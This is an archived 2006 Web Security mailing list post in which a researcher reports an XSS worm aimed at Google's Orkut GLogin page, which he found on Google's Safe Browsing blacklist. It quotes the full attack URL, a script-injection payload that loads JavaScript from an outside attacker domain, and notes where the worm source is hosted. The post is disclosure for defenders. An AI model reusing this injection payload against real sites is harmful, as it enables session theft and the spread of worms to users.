[WEB SECURITY] XSS worm attacking Google?

Billy Hoffman Billy.Hoffman at spidynamics.com
Sat Dec 9 15:49:27 EST 2006


Folks,

I was running through some proxy logs, and saw a reference to
http://sb.google.com/safebrowsing/update

Requesting redirected me to a blacklist of what look like phishing
sites. However, all the way at the bottom was a reference to Google's
Orkut site. Specficially the blacklist entry was for a GET-based XSS
attack against Google's GLogin system.

https://www.orkut.com/GLogin.aspx?done=http://www.orkut.com/Scrapbook.as
px?na=\";};//--></script><script%20src=\'http://www.probranco.net/xmen.j
s\'></script><!--

If you request that URL, you get a 403 error page saying your query is
from an automated attack. Looks very similar to a page Google returned
during the Perl.Santy attack a year or so back.

The JavaScript source code to the attack is still available at
http://www.probranco.net/xmen.js

Enjoy,
Billy Hoffman
--
Lead Researcher, SPI Labs
SPI Dynamics Inc. - http://www.spidynamics.com
Phone:	678-781-4800
Direct:	678-781-4845


----------------------------------------------------------------------------
The Web Security Mailing List: 
http://www.webappsec.org/lists/websecurity/

The Web Security Mailing List Archives: 
http://www.webappsec.org/lists/websecurity/archive/
http://www.webappsec.org/rss/websecurity.rss [RSS Feed]



More information about the websecurity mailing list